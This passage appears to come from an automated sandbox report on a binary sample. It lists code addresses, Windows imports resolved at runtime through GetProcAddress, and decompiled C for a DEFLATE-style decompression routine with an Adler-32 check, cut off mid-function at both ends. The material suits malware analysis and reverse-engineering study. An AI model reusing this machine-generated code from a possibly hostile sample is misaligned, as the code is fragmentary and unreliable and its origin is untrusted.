						E003C6CB0( &_v228, 0x9b);
						_t273 = _t275 + 0x20;
						_t199 = GetProcAddress(_t272,  &_v228);
						 *0x3e85c8 = _t199;
						if(_t199 != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
			}























































































    0x003cc329
    0x003cc33a
    0x003cc33d
    0x003cc340
    0x003cc347
    0x003cc34a
    0x003cc34d
    0x003cc350
    0x003cc361
    0x003cc364
    0x003cc368
    0x003cc36b
    0x003cc36e
    0x003cc371
    0x003cc374
    0x003cc37a
    0x003cc44f
    0x003cc44f
    0x003cc458
    0x003cc463
    0x003cc463
    0x003cc46e
    0x003cc470
    0x003cc472
    0x003cc474
    0x003cc48a
    0x003cc48c
    0x003cc48e
    0x003cc49b
    0x003cc4a8
    0x003cc4af
    0x003cc4bd
    0x003cc4bd
    0x003cc48e
    0x003cc4bf
    0x003cc4c4
    0x003cc4c7
    0x003cc4c9
    0x003cc515
    0x003cc515
    0x003cc51a
    0x003cc51c
    0x00000000
    0x003cc522
    0x003cc524
    0x003cc526
    0x003cc529
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003cc529
    0x003cc4cb
    0x003cc4d7
    0x003cc4d9
    0x003cc4db
    0x00000000
    0x003cc4dd
    0x003cc4dd
    0x003cc4e0
    0x003cc4e3
    0x003cc4e5
    0x003cc4e7
    0x003cc4e9
    0x003cc4f0
    0x003cc4f0
    0x003cc4f2
    0x003cc501
    0x003cc501
    0x003cc501
    0x003cc4f4
    0x003cc4f5
    0x003cc4f8
    0x003cc4fa
    0x00000000
    0x00000000
    0x003cc4fc
    0x00000000
    0x003cc4fa
    0x003cc4f0
    0x003cc504
    0x003cc504
    0x003cc509
    0x003cc50b
    0x003cc50e
    0x003cc50e
    0x003cc510
    0x003cc513
    0x003cc52f
    0x003cc52f
    0x003cc53b
    0x003cc542
    0x003cc548
    0x003cc54a
    0x003cc711
    0x003cc711
    0x003cc550
    0x003cc553
    0x003cc56d
    0x003cc56f
    0x003cc571
    0x00000000
    0x003cc577
    0x003cc57a
    0x003cc586
    0x003cc58b
    0x003cc599
    0x003cc5a3
    0x003cc5a5
    0x003cc5a7
    0x003cc5a9
    0x003cc5d1
    0x003cc5db
    0x003cc5ec
    0x003cc5ee
    0x003cc5f0
    0x003cc5fa
    0x003cc608
    0x003cc60d
    0x003cc614
    0x003cc61a
    0x003cc631
    0x003cc633
    0x003cc635
    0x003cc640
    0x003cc643
    0x003cc646
    0x003cc649
    0x003cc64c
    0x003cc64f
    0x003cc652
    0x003cc655
    0x003cc65e
    0x003cc661
    0x003cc66b
    0x003cc672
    0x003cc67b
    0x003cc67d
    0x003cc691
    0x003cc698
    0x003cc6a0
    0x003cc6aa
    0x003cc6b0
    0x003cc6b6
    0x003cc6c0
    0x003cc6c2
    0x003cc6c4
    0x003cc6e0
    0x003cc6f2
    0x003cc6f4
    0x003cc6f6
    0x003cc701
    0x003cc706
    0x003cc708
    0x003cc708
    0x003cc6f6
    0x003cc6c4
    0x003cc67d
    0x003cc635
    0x003cc5ab
    0x003cc5ab
    0x003cc5b1
    0x003cc5b4
    0x003cc5c4
    0x003cc5c6
    0x003cc5c9
    0x003cc5cb
    0x00000000
    0x00000000
    0x003cc5cb
    0x003cc5b4
    0x003cc5a9
    0x003cc571
    0x00000000
    0x00000000
    0x00000000
    0x003cc513
    0x003cc4db
    0x003cc714
    0x003cc717
    0x003cc719
    0x003cc71f
    0x003cc724
    0x003cc72b
    0x003cc72b
    0x003cc72d
    0x003cc730
    0x003cc732
    0x003cc734
    0x003cc741
    0x003cc741
    0x003cc743
    0x003cc746
    0x003cc748
    0x003cc74a
    0x003cc750
    0x003cc757
    0x003cc757
    0x003cc759
    0x003cc75b
    0x003cc75e
    0x003cc763
    0x003cc766
    0x003cc769
    0x003cc76b
    0x003cc76d
    0x003cc783
    0x003cc788
    0x003cc795
    0x003cc795
    0x003cc7a0
    0x003cc380
    0x003cc38c
    0x003cc391
    0x003cc39a
    0x003cc3a6
    0x003cc3aa
    0x003cc448
    0x003cc44e
    0x003cc3b0
    0x003cc3bc
    0x003cc3d4
    0x003cc3e5
    0x003cc403
    0x003cc408
    0x003cc426
    0x003cc42b
    0x003cc430
    0x003cc43b
    0x003cc43d
    0x003cc444
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003cc444
    0x003cc3aa

    APIs
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CC3D2
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CC3F5
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CC418
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CC43B
    • GetLastError.KERNEL32 ref: 003CC5AB
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D257B, Relevance: 14.1, APIs: 10, Instructions: 1558Crypto
    C-Code - Quality: 99%
    			E003D257B(int* __esi, signed int _a4, signed int* _a8, intOrPtr _a12, signed int _a16, signed int _a20, signed int _a24) {
				void* _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed char* _v24;
				void* _v28;
				signed int _v32;
				signed char _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				int _v56;
				signed int _v60;
				intOrPtr _v124;
				intOrPtr _v128;
				void _v192;
				void* _t811;
				signed int _t812;
				signed int* _t815;
				void* _t816;
				signed int _t821;
				signed int _t822;
				signed int _t831;
				void* _t834;
				signed int _t835;
				void* _t841;
				void* _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t847;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int* _t854;
				signed int _t858;
				unsigned int _t861;
				signed int _t862;
				signed int _t867;
				signed int _t871;
				signed int _t875;
				int _t880;
				signed int _t884;
				signed int _t896;
				signed int _t900;
				void* _t902;
				signed int _t905;
				void* _t908;
				signed int _t912;
				int _t916;
				intOrPtr* _t919;
				char* _t922;
				signed int _t926;
				signed char* _t933;
				signed int _t937;
				signed int _t940;
				signed int _t941;
				signed int _t943;
				signed int _t951;
				signed int _t952;
				char* _t953;
				signed char* _t955;
				signed int _t959;
				signed int _t962;
				signed int _t963;
				signed int _t965;
				signed int _t968;
				signed int _t972;
				signed int _t988;
				void* _t989;
				int _t992;
				signed int _t1002;
				signed int _t1004;
				int _t1005;
				signed int _t1012;
				signed int _t1013;
				signed char* _t1014;
				signed int _t1018;
				signed int _t1021;
				signed int _t1022;
				signed int _t1024;
				signed int _t1025;
				signed int _t1026;
				signed int _t1027;
				signed int _t1030;
				signed int _t1043;
				signed int _t1044;
				signed int _t1045;
				signed int _t1053;
				signed int _t1055;
				signed int _t1056;
				signed int _t1058;
				signed int _t1059;
				signed int _t1060;
				signed int _t1062;
				signed int _t1063;
				signed int _t1065;
				signed int _t1066;
				signed int _t1067;
				signed int _t1068;
				void* _t1090;
				signed int _t1091;
				signed int _t1093;
				void* _t1104;
				signed int _t1105;
				signed int* _t1107;
				signed int _t1108;
				void* _t1112;
				void* _t1113;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed char* _t1122;
				signed char _t1131;
				signed char _t1144;
				void* _t1150;
				intOrPtr _t1151;
				signed char _t1157;
				signed char _t1163;
				signed int _t1168;
				signed int* _t1175;
				short* _t1176;
				signed char _t1177;
				signed char _t1178;
				signed int _t1180;
				signed int _t1182;
				signed char _t1186;
				signed char _t1187;
				signed int _t1190;
				intOrPtr* _t1191;
				signed int _t1200;
				signed char _t1207;
				signed char _t1212;
				int _t1222;
				signed char* _t1226;
				signed char* _t1228;
				signed char* _t1230;
				signed char* _t1232;
				signed char* _t1234;
				signed char* _t1243;
				char* _t1297;
				intOrPtr _t1298;
				signed int _t1299;
				intOrPtr* _t1312;
				signed int _t1313;
				signed int _t1316;
				signed int _t1318;
				signed char* _t1336;
				signed int _t1337;
				int _t1338;
				void* _t1340;
				void* _t1341;
				void* _t1342;
				void* _t1343;
				void* _t1344;
				void* _t1345;
				void* _t1346;
				signed int _t1347;
				signed int _t1348;
				signed int _t1357;
				signed int _t1358;
				char* _t1359;
				char* _t1362;
				signed int _t1366;
				void* _t1368;
				signed int _t1369;
				int _t1375;
				int _t1379;
				int* _t1381;
				void* _t1382;
				void* _t1383;
				void* _t1389;
				void* _t1390;

				_t1381 = __esi;
				_t1243 = _a4;
				_v20 = _v20 | 0xffffffff;
				_t1090 = _a16;
				_t811 =  *_a20;
				_v48 = _t811 + _t1090;
				_t1336 =  &(_t1243[ *_a8]);
				_t1117 = _a24 & 0x00000004;
				_v8 = _t1243;
				_v24 = _t1336;
				_v28 = _t1090;
				_v44 = _t1117;
				if(_t1117 == 0) {
					_t812 = _t811 - _a12;
					__eflags = _t812;
					_t16 = _t1090 - 1; // 0xfe
					_t1118 = _t812 + _t16;
				} else {
					_t1118 = _t1117 | 0xffffffff;
				}
				_t17 = _t1118 + 1; // 0xff
				_v60 = _t1118;
				if((_t1118 & _t17) != 0 || _t1090 < _a12) {
					 *_a20 =  *_a20 & 0x00000000;
					_t815 = _a8;
					 *_t815 =  *_t815 & 0x00000000;
					__eflags =  *_t815;
					_t816 = 0xfffffffd;
					return _t816;
				} else {
					_t1091 = _t1381[1];
					_t1119 = _t1381[8];
					_v12 = _t1381[0xe];
					_v16 = _t1381[9];
					_v36 = _t1381[0xa];
					_v56 = _t1381[0xf];
					_t821 =  *_t1381;
					_v32 = _t1091;
					_v40 = _t1119;
					_t1389 = _t821 - 0x18;
					if(_t1389 > 0) {
						__eflags = _t821 - 0x26;
						if(__eflags > 0) {
							_t822 = _t821 - 0x27;
							__eflags = _t822;
							if(_t822 == 0) {
								L394:
								 *_t1381 = 0x27;
								L395:
								_v20 = _v20 | 0xffffffff;
								L396:
								_t1381[0xe] = _v12;
								_t1381[8] = _v40;
								_t1381[9] = _v16;
								_t1381[0xa] = _v36;
								_t1381[0xf] = _v56;
								_t1381[1] = _t1091;
								 *_a8 = _v8 - _a4;
								_t831 = _v28 - _a16;
								 *_a20 = _t831;
								if((_a24 & 0x00000009) == 0 || _v20 < 0) {
									L410:
									return _v20;
								} else {
									_t1122 = _a16;
									_a16 = _t1381[7] & 0x0000ffff;
									_a20 = _t831;
									_t1337 = _t1381[7] & 0x0000ffff;
									_t1093 = _a16;
									_a4 = _t831 % 0x15b0;
									if(_a20 == 0) {
										L406:
										_t1338 = _t1337 + (_t1093 << 0x10);
										_t1381[7] = _t1338;
										if(_v20 == 0 && (_a24 & 0x00000001) != 0 && _t1338 != _t1381[4]) {
											_v20 = 0xfffffffe;
										}
										goto L410;
									} else {
										goto L399;
									}
									do {
										L399:
										_a16 = _a16 & 0x00000000;
										_t834 = 7;
										if(_a4 <= _t834) {
											L402:
											_t835 = _a4;
											if(_a16 >= _t835) {
												goto L405;
											}
											_t841 = _t835 - _a16;
											do {
												_t1337 = _t1337 + ( *_t1122 & 0x000000ff);
												_t1122 =  &(_t1122[1]);
												_t1093 = _t1093 + _t1337;
												_t841 = _t841 - 1;
											} while (_t841 != 0);
											goto L405;
										}
										_t842 = _t834 - _t1122;
										do {
											_t1340 = _t1337 + ( *_t1122 & 0x000000ff);
											_t1341 = _t1340 + (_t1122[1] & 0x000000ff);
											_t1342 = _t1341 + (_t1122[2] & 0x000000ff);
											_t1343 = _t1342 + (_t1122[3] & 0x000000ff);
											_a16 = _a16 + 8;
											_t1344 = _t1343 + (_t1122[4] & 0x000000ff);
											_t1345 = _t1344 + (_t1122[5] & 0x000000ff);
											_t1346 = _t1345 + (_t1122[6] & 0x000000ff);
											_t1337 = _t1346 + (_t1122[7] & 0x000000ff);
											_t1122 =  &(_t1122[8]);
											_t1093 = _t1093 + _t1340 + _t1341 + _t1342 + _t1343 + _t1344 + _t1345 + _t1346 + _t1337;
										} while ( &(_t1122[_t842]) < _a4);
										goto L402;
										L405:
										_t1337 = _t1337 % 0xfff1;
										_t796 =  &_a20;
										 *_t796 = _a20 - _a4;
										_a4 = 0x15b0;
										_t1093 = _t1093 % 0xfff1;
									} while ( *_t796 != 0);
									goto L406;
								}
							}
							_t843 = _t822 - 1;
							__eflags = _t843;
							if(_t843 == 0) {
								L393:
								 *_t1381 = 0x28;
								goto L395;
							}
							_t844 = _t843 - 1;
							__eflags = _t844;
							if(_t844 == 0) {
								__eflags = _t1243 - _t1336;
								if(_t1243 >= _t1336) {
									L376:
									__eflags = _a24 & 0x00000002;
									if((_a24 & 0x00000002) != 0) {
										_v20 = 1;
										 *_t1381 = 0x29;
										goto L396;
									}
									_t845 = 0;
									__eflags = 0;
									L378:
									_v12 = _v12 | _t845 << _t1091;
									_t1091 = _t1091 + 8;
									__eflags = _t1091;
									L379:
									__eflags = _t1091 - 8;
									if(_t1091 >= 8) {
										_t847 = _v12 & 0x000000ff;
										_v12 = _v12 >> 8;
										_t1091 = _t1091 - 8;
										__eflags = _t1091;
										L383:
										_t720 =  &_v16;
										 *_t720 = _v16 + 1;
										__eflags =  *_t720;
										_t1381[4] = _t1381[4] << 0x00000008 | _t847;
										L384:
										__eflags = _v16 - 4;
										if(_v16 >= 4) {
											L392:
											_v20 = _v20 & 0x00000000;
											 *_t1381 = 0x22;
											goto L396;
										}
										__eflags = _t1091;
										if(_t1091 != 0) {
											goto L379;
										}
										__eflags = _v8 - _t1336;
										if(_v8 < _t1336) {
											_t847 =  *_v8 & 0x000000ff;
											_v8 = _v8 + 1;
											goto L383;
										}
										L387:
										__eflags = _a24 & 0x00000002;
										if((_a24 & 0x00000002) != 0) {
											_v20 = 1;
											 *_t1381 = 0x2a;
											goto L396;
										}
										_t847 = 0;
										goto L383;
									}
									__eflags = _v8 - _t1336;
									if(_v8 >= _t1336) {
										goto L376;
									}
									_t845 =  *_v8 & 0x000000ff;
									_v8 = _v8 + 1;
									goto L378;
								}
								_t845 =  *_t1243 & 0x000000ff;
								_v8 =  &(_t1243[1]);
								goto L378;
							}
							_t850 = _t844 - 1;
							__eflags = _t850;
							if(_t850 == 0) {
								__eflags = _t1243 - _t1336;
								if(_t1243 >= _t1336) {
									goto L387;
								}
								_t847 =  *_t1243 & 0x000000ff;
								_v8 =  &(_t1243[1]);
								goto L383;
							}
							_t851 = _t850 - 9;
							__eflags = _t851;
							if(_t851 == 0) {
								__eflags = _t1243 - _t1336;
								if(_t1243 >= _t1336) {
									L92:
									__eflags = _a24 & 0x00000002;
									if((_a24 & 0x00000002) != 0) {
										_v20 = 1;
										 *_t1381 = 0x33;
										goto L396;
									}
									_t852 = 0;
									__eflags = 0;
									L94:
									_v12 = _v12 | _t852 << _t1091;
									_t1091 = _t1091 + 8;
									__eflags = _t1091;
									L95:
									__eflags = _t1091 - 8;
									if(_t1091 >= 8) {
										_t1119 = _v12 & 0x000000ff;
										_v12 = _v12 >> 8;
										_v40 = _t1119;
										_t1091 = _t1091 - 8;
										__eflags = _t1091;
										L99:
										_t854 = _v28;
										__eflags = _t854 - _v48;
										if(_t854 >= _v48) {
											_v20 = 2;
											 *_t1381 = 0x34;
											goto L396;
										}
										 *_t854 = _t1119;
										_t117 =  &_v16;
										 *_t117 = _v16 - 1;
										__eflags =  *_t117;
										_v28 =  &(_t854[0]);
										L101:
										__eflags = _v16;
										if(_v16 == 0) {
											L113:
											__eflags = _t1381[5] & 0x00000001;
											if((_t1381[5] & 0x00000001) == 0) {
												L121:
												__eflags = _t1091 - 3;
												if(_t1091 < 3) {
													__eflags = _v8 - _v24;
													if(_v8 < _v24) {
														_t858 =  *_v8 & 0x000000ff;
														_t152 =  &_v8;
														 *_t152 = _v8 + 1;
														__eflags =  *_t152;
														L120:
														_v12 = _v12 | _t858 << _t1091;
														_t1091 = _t1091 + 8;
														__eflags = _t1091;
														goto L121;
													}
													L117:
													__eflags = _a24 & 0x00000002;
													if((_a24 & 0x00000002) != 0) {
														_v20 = 1;
														 *_t1381 = 3;
														goto L396;
													}
													_t858 = 0;
													goto L120;
												}
												_v12 = _v12 >> 3;
												_t861 = _v12 & 0x00000007;
												_t1091 = _t1091 - 3;
												_t1381[5] = _t861;
												_t862 = _t861 >> 1;
												__eflags = _t862;
												_v32 = _t1091;
												_t1381[6] = _t862;
												if(_t862 == 0) {
													L322:
													__eflags = _t1091 - (_t1091 & 0x00000007);
													if(_t1091 < (_t1091 & 0x00000007)) {
														__eflags = _v8 - _v24;
														if(_v8 < _v24) {
															_t867 =  *_v8 & 0x000000ff;
															_t622 =  &_v8;
															 *_t622 = _v8 + 1;
															__eflags =  *_t622;
															L321:
															_v12 = _v12 | _t867 << _t1091;
															_t1091 = _t1091 + 8;
															__eflags = _t1091;
															goto L322;
														}
														L318:
														__eflags = _a24 & 0x00000002;
														if((_a24 & 0x00000002) != 0) {
															_v20 = 1;
															 *_t1381 = 5;
															goto L396;
														}
														_t867 = 0;
														goto L321;
													}
													_t1131 = _t1091 & 0x00000007;
													_v12 = _v12 >> _t1131;
													_t1091 = _t1091 - _t1131;
													_t628 =  &_v16;
													 *_t628 = _v16 & 0x00000000;
													__eflags =  *_t628;
													L324:
													__eflags = _v16 - 4;
													if(_v16 >= 4) {
														_t871 = (_t1381[0xa48] & 0x000000ff) << 0x00000008 | _t1381[0xa48] & 0x000000ff;
														_v16 = _t871;
														__eflags = _t871 - (((_t1381[0xa48] & 0x000000ff) << 0x00000008 | _t1381[0xa48] & 0x000000ff) ^ 0x0000ffff);
														if(_t871 != (((_t1381[0xa48] & 0x000000ff) << 0x00000008 | _t1381[0xa48] & 0x000000ff) ^ 0x0000ffff)) {
															goto L394;
														}
														_t1336 = _v24;
														goto L101;
													}
													__eflags = _t1091;
													if(_t1091 != 0) {
														L334:
														__eflags = _t1091 - 8;
														if(_t1091 < 8) {
															__eflags = _v8 - _v24;
															if(_v8 < _v24) {
																_t884 =  *_v8 & 0x000000ff;
																_t645 =  &_v8;
																 *_t645 = _v8 + 1;
																__eflags =  *_t645;
																L333:
																_v12 = _v12 | _t884 << _t1091;
																_t1091 = _t1091 + 8;
																__eflags = _t1091;
																goto L334;
															}
															L330:
															__eflags = _a24 & 0x00000002;
															if((_a24 & 0x00000002) != 0) {
																_v20 = 1;
																 *_t1381 = 6;
																goto L396;
															}
															_t884 = 0;
															goto L333;
														}
														_v12 = _v12 >> 8;
														 *( &(_t1381[0xa48]) + _v16) = _v12;
														_t1091 = _t1091 - 8;
														L337:
														_v16 = _v16 + 1;
														goto L324;
													}
													__eflags = _v8 - _v24;
													if(_v8 < _v24) {
														_t657 =  &_v8;
														 *_t657 = _v8 + 1;
														__eflags =  *_t657;
														 *( &(_t1381[0xa48]) + _v16) =  *_v8;
														goto L337;
													}
													L327:
													__eflags = _a24 & 0x00000002;
													if((_a24 & 0x00000002) != 0) {
														_v20 = 1;
														 *_t1381 = 7;
														goto L396;
													}
													 *( &(_t1381[0xa48]) + _v16) = 0;
													goto L337;
												}
												__eflags = _t862 - 3;
												if(_t862 == 3) {
													L349:
													 *_t1381 = 0xa;
													goto L395;
												}
												__eflags = _t862 - 1;
												if(_t862 != 1) {
													_t1347 = 0;
													__eflags = 0;
													L127:
													_v16 = _t1347;
													__eflags = _t1347 - 3;
													if(_t1347 >= 3) {
														memset( &(_t1381[0x6e0]), 0, 0x120);
														_t1383 = _t1383 + 0xc;
														_t202 =  &_v16;
														 *_t202 = _v16 & 0x00000000;
														__eflags =  *_t202;
														L137:
														__eflags = _v16 - _t1381[0xd];
														if(_v16 < _t1381[0xd]) {
															L161:
															__eflags = _t1091 - 3;
															if(_t1091 < 3) {
																__eflags = _v8 - _v24;
																if(_v8 < _v24) {
																	_t896 =  *_v8 & 0x000000ff;
																	_t261 =  &_v8;
																	 *_t261 = _v8 + 1;
																	__eflags =  *_t261;
																	L160:
																	_v12 = _v12 | _t896 << _t1091;
																	_t1091 = _t1091 + 8;
																	__eflags = _t1091;
																	goto L161;
																}
																L157:
																__eflags = _a24 & 0x00000002;
																if((_a24 & 0x00000002) != 0) {
																	_v20 = 1;
																	 *_t1381 = 0xe;
																	goto L396;
																}
																_t896 = 0;
																goto L160;
															}
															_t267 = _v16 + 0x3e6620; // 0x121110
															_v12 = _v12 >> 3;
															_t1091 = _t1091 - 3;
															_v16 = _v16 + 1;
															_v32 = _t1091;
															 *((char*)( &(_t1381[0x6e0]) + ( *_t267 & 0x000000ff))) = _v12 & 0x00000007;
															goto L137;
														}
														_t1381[0xd] = 0x13;
														L139:
														_t900 = _t1381[6];
														__eflags = _t900;
														if(_t900 < 0) {
															while(1) {
																L215:
																_t902 = _v24 - _v8;
																__eflags = _t902 - 4;
																if(_t902 < 4) {
																	break;
																}
																__eflags = _v48 - _v28 - 2;
																if(_v48 - _v28 < 2) {
																	break;
																}
																__eflags = _t1091 - 0xf;
																if(_t1091 < 0xf) {
																	_v8 = _v8 + 2;
																	_v12 = _v12 | ( *_v8 & 0x0000ffff) << _t1091;
																	_t1091 = _t1091 + 0x10;
																	__eflags = _t1091;
																}
																_t968 =  *((short*)(_t1381 + 0x160 + (_v12 & 0x000003ff) * 2));
																__eflags = _t968;
																if(_t968 < 0) {
																	_t1357 = 0xa;
																	do {
																		_t968 =  *((short*)(_t1381 + 0x960 + ((_v12 >> _t1357 & 0x00000001) +  !_t968) * 2));
																		_t1357 = _t1357 + 1;
																		__eflags = _t968;
																	} while (_t968 < 0);
																	goto L223;
																} else {
																	_t1357 = _t968 >> 9;
																	L223:
																	_v12 = _v12 >> _t1357;
																	_t1091 = _t1091 - _t1357;
																	_v16 = _t968;
																	__eflags = _t968 & 0x00000100;
																	if((_t968 & 0x00000100) != 0) {
																		L256:
																		_v16 = _v16 & 0x000001ff;
																		__eflags = _v16 - 0x100;
																		if(_v16 == 0x100) {
																			goto L113;
																		}
																		_t908 = _v16 * 4 - 0x404;
																		_t482 = _t908 + 0x3e64a0; // 0x0
																		_t1187 =  *_t482;
																		_t483 = _t908 + 0x3e6420; // 0x1
																		_v36 = _t1187;
																		_v16 =  *_t483;
																		__eflags = _t1187;
																		if(_t1187 == 0) {
																			L266:
																			__eflags = _t1091 - 0xf;
																			if(_t1091 >= 0xf) {
																				L282:
																				_t912 =  *((short*)(_t1381 + 0xf00 + (_v12 & 0x000003ff) * 2));
																				__eflags = _t912;
																				if(_t912 < 0) {
																					_t1358 = 0xa;
																					do {
																						_t912 =  *((short*)(_t1381 + 0x1700 + ((_v12 >> _t1358 & 0x00000001) +  !_t912) * 2));
																						_t1358 = _t1358 + 1;
																						__eflags = _t912;
																					} while (_t912 < 0);
																					L286:
																					_v12 = _v12 >> _t1358;
																					_t1190 =  *(0x3e65a0 + _t912 * 4);
																					_t1091 = _t1091 - _t1358;
																					_v36 = _t1190;
																					_v40 =  *((intOrPtr*)(0x3e6520 + _t912 * 4));
																					__eflags = _t1190;
																					if(_t1190 == 0) {
																						L295:
																						_t1191 = _v28;
																						_t916 = _t1191 - _a12;
																						_v56 = _t916;
																						__eflags = _v40 - _t916;
																						if(_v40 <= _t916) {
																							L297:
																							_t919 = (_t916 - _v40 & _v60) + _a12;
																							__eflags = _t1191 - _t919;
																							if(_t1191 <= _t919) {
																								_t1191 = _t919;
																							}
																							__eflags = _t1191 + _v16 - _v48;
																							if(_t1191 + _v16 <= _v48) {
																								__eflags = _v16 - 9;
																								if(_v16 < 9) {
																									L312:
																									_t1359 = _v28;
																									do {
																										L313:
																										_v16 = _v16 - 3;
																										 *_t1359 =  *_t919;
																										 *((char*)(_t1359 + 1)) =  *((intOrPtr*)(_t919 + 1));
																										 *((char*)(_t1359 + 2)) =  *((intOrPtr*)(_t919 + 2));
																										_t1359 = _t1359 + 3;
																										_t919 = _t919 + 3;
																										__eflags = _v16 - 2;
																									} while (_v16 > 2);
																									__eflags = _v16;
																									_v28 = _t1359;
																									if(_v16 <= 0) {
																										continue;
																									}
																									__eflags = _v16 - 1;
																									 *_t1359 =  *_t919;
																									if(_v16 <= 1) {
																										L311:
																										_v28 = _t1359 + _v16;
																										continue;
																									}
																									L310:
																									 *((char*)(_t1359 + 1)) =  *((intOrPtr*)(_t919 + 1));
																									goto L311;
																								}
																								__eflags = _v16 - _v40;
																								if(_v16 > _v40) {
																									goto L312;
																								}
																								_t1362 = _v28;
																								_t1200 = (_v16 & 0xfffffff8) + _t919;
																								__eflags = _t1200;
																								do {
																									 *_t1362 =  *_t919;
																									 *((intOrPtr*)(_t1362 + 4)) =  *((intOrPtr*)(_t919 + 4));
																									_t919 = _t919 + 8;
																									_t1362 = _t1362 + 8;
																									__eflags = _t919 - _t1200;
																								} while (_t919 < _t1200);
																								_v16 = _v16 & 0x00000007;
																								__eflags = _v16 - 3;
																								_v28 = _t1362;
																								if(_v16 >= 3) {
																									goto L313;
																								}
																								__eflags = _v16;
																								if(_v16 == 0) {
																									continue;
																								}
																								__eflags = _v16 - 1;
																								 *_t1362 =  *_t919;
																								if(_v16 <= 1) {
																									goto L311;
																								}
																								goto L310;
																							} else {
																								L300:
																								_v16 = _v16 - 1;
																								__eflags = _v16;
																								if(_v16 == 0) {
																									continue;
																								}
																								L301:
																								_t922 = _v28;
																								__eflags = _t922 - _v48;
																								if(_t922 >= _v48) {
																									_v20 = 2;
																									 *_t1381 = 0x35;
																									goto L396;
																								}
																								 *_t922 =  *((intOrPtr*)((_v56 - _v40 & _v60) + _a12));
																								_v56 = _v56 + 1;
																								_v28 = _t922 + 1;
																								goto L300;
																							}
																						}
																						__eflags = _a24 & 0x00000004;
																						if((_a24 & 0x00000004) != 0) {
																							L81:
																							 *_t1381 = 0x25;
																							goto L395;
																						}
																						goto L297;
																					}
																					L293:
																					__eflags = _t1091 - _v36;
																					if(_t1091 < _v36) {
																						__eflags = _v8 - _v24;
																						if(_v8 < _v24) {
																							_t926 =  *_v8 & 0x000000ff;
																							_t552 =  &_v8;
																							 *_t552 = _v8 + 1;
																							__eflags =  *_t552;
																							L292:
																							_v12 = _v12 | _t926 << _t1091;
																							_t1091 = _t1091 + 8;
																							__eflags = _t1091;
																							goto L293;
																						}
																						L289:
																						__eflags = _a24 & 0x00000002;
																						if((_a24 & 0x00000002) != 0) {
																							_v20 = 1;
																							 *_t1381 = 0x1b;
																							goto L396;
																						}
																						_t926 = 0;
																						goto L292;
																					}
																					_t1207 = _v36;
																					_t1091 = _t1091 - _t1207;
																					_v12 = _v12 >> _t1207;
																					_t561 =  &_v40;
																					 *_t561 = _v40 + ((1 << _t1207) - 0x00000001 & _v12);
																					__eflags =  *_t561;
																					goto L295;
																				}
																				_t1358 = _t912 >> 9;
																				_t912 = _t912 & 0x000001ff;
																				goto L286;
																			}
																			_t933 = _v8;
																			__eflags = _v24 - _t933 - 2;
																			if(_v24 - _t933 >= 2) {
																				_v8 =  &(_t933[2]);
																				_v12 = _v12 | (_t933[1] & 0x000000ff) << _t1091 + 0x00000008 | ( *_t933 & 0x000000ff) << _t1091;
																				_t1091 = _t1091 + 0x10;
																				__eflags = _t1091;
																				goto L282;
																			}
																			L268:
																			_t937 =  *((short*)(_t1381 + 0xf00 + (_v12 & 0x000003ff) * 2));
																			__eflags = _t937;
																			if(_t937 < 0) {
																				_t1212 = 0xa;
																				__eflags = _t1091 - _t1212;
																				if(_t1091 <= _t1212) {
																					L275:
																					__eflags = _v8 - _v24;
																					if(_v8 < _v24) {
																						_t940 =  *_v8 & 0x000000ff;
																						_t521 =  &_v8;
																						 *_t521 = _v8 + 1;
																						__eflags =  *_t521;
																						L279:
																						_t941 = _t940 << _t1091;
																						_t1091 = _t1091 + 8;
																						_v12 = _v12 | _t941;
																						__eflags = _t1091 - 0xf;
																						if(_t1091 < 0xf) {
																							goto L268;
																						}
																						goto L282;
																					}
																					L276:
																					__eflags = _a24 & 0x00000002;
																					if((_a24 & 0x00000002) != 0) {
																						_v20 = 1;
																						 *_t1381 = 0x1a;
																						goto L396;
																					}
																					_t940 = 0;
																					goto L279;
																				} else {
																					goto L273;
																				}
																				while(1) {
																					L273:
																					_t937 =  *((short*)(_t1381 + 0x1700 + ((_v12 >> _t1212 & 0x00000001) +  !_t937) * 2));
																					_t1212 = _t1212 + 1;
																					__eflags = _t937;
																					if(_t937 >= 0) {
																						goto L282;
																					}
																					_t514 = _t1212 + 1; // 0xc
																					__eflags = _t1091 - _t514;
																					if(_t1091 >= _t514) {
																						continue;
																					}
																					goto L275;
																				}
																				goto L282;
																			}
																			_t943 = _t937 >> 9;
																			__eflags = _t943;
																			if(_t943 == 0) {
																				goto L275;
																			}
																			__eflags = _t1091 - _t943;
																			if(_t1091 >= _t943) {
																				goto L282;
																			}
